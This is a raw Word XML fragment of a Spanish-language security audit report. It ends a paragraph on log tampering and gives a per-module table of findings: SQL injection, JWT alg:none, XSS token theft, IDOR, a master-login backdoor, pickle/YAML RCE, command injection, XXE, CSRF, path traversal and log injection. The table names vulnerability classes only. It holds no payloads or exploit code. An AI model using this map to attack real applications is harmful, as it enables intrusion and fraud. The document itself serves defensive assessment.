        <w:t xml:space="preserve">, permitiendo fabricar o borrar evidencia e invalidar la detección de intrusos. Como no hay configuración de logging en el baseline, los </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>logger.info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de auditoría ni siquiera se persisten.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Resumen de hallazgos por módulo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E4A7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2160"/>
            <w:shd w:val="clear" w:fill="2E4A7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Vector servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:fill="2E4A7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Vector cliente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:fill="2E4A7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Alteración/Detección</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>1 Autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>SQLi login, JWT alg:none/secreto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>XSS→robo de token (localStorage/cookie)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>IDOR update-password, reset predecible, YAML RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>2 Gestión Usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>Mass assignment, fuga de hashes, SSRF/SSTI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>XSS almacenado/reflejado en AdminPanel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>master-login backdoor, assert authz, eval/exec/pickle RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>3 Operaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>SQLi historial/búsqueda, cmd injection, XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>XSS almacenado en recibo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>monto negativo, débito ajeno, CSRF quickpay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>4 Auditoría/Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>fuga de secretos, path traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:t>render de logs + debug Werkzeug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audit poisoning</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (log injection)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